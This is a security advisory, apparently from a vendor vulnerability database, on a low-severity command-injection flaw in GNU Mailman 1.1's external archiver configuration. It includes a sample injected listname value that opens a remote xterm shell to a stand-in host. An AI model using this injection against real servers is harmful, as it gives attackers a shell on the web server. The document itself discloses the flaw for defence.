Title: Mailman 1.1 Writable Variable Vulnerability
Severity: LOW
Description:
Mailman supports external archiving of messages, typically via an archiver like MHonArc or hypermail. Macros may be used which are based on variables internal to Mailman.
For example, list archives can be saved on a per-list basis with the following entry in $prefix/Mailman/mm_cfg.py, :
PUBLIC_EXTERNAL_ARCHIVER = '(mhonarc -add -nolock -umask 023 -rcfile rc.%(listname)s -outdir /mnt/WWW/htdocs/lists/%(listname)s)'
The (listname) value can be created for each list by the list administrator.
If the listname variable is set to a system command, the command will be run every time a message is sent to the list as Mailman archives the message.
For example, if the listname value is set to: `/usr/X11R6/bin/xterm -display myhost.example.com:0 -e /bin/csh`
Upon receipt of a message to the list, the embedded command will be executed, in this example opening a remote xterm with a shell running under the uid/gid of the Web server.
Other variable names may also be accessed, depending on the configuration of your PUBLIC_EXTERNAL_ARCHIVER definition.
The patch supplied under the Solution tab will only fix problems with %(listname)s expansion.
Affected Products:
- Debian Linux 2.2.0
- Debian Linux 2.2.0 68k
- Debian Linux 2.2.0 IA-32
- Debian Linux 2.2.0 alpha
- Debian Linux 2.2.0 arm
- Debian Linux 2.2.0 powerpc
- Debian Linux 2.2.0 sparc
- GNU Mailman 1.1.0
Juniper Networks provides this content via a wide variety of sources and production methods. If notified of errors or omissions in the content of this page, Juniper Networks, at its discretion, will modify or remove the page or leave the content as is, depending on various factors including but not limited to the reputation and authority of the party providing the notification. Please use the contact information displayed elsewhere on this page to report any errors or omissions regarding the content on this page.
